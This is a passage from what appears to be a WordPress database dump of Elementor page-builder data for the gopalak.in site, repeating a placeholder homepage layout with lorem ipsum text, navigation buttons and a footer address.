leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8409,1475,'_elementor_page_assets','a:0:{}'),(8411,1476,'_elementor_edit_mode','builder'),(8412,1476,'_elementor_template_type','wp-page'),(8413,1476,'_elementor_version','3.7.7'),(8414,1476,'_wp_page_template','elementor_canvas'),(8415,1476,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8416,1476,'_elementor_page_assets','a:0:{}'),(8419,1477,'_elementor_edit_mode','builder'),(8420,1477,'_elementor_template_type','wp-page'),(8421,1477,'_elementor_version','3.7.7'),(8422,1477,'_wp_page_template','elementor_canvas'),(8423,1477,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 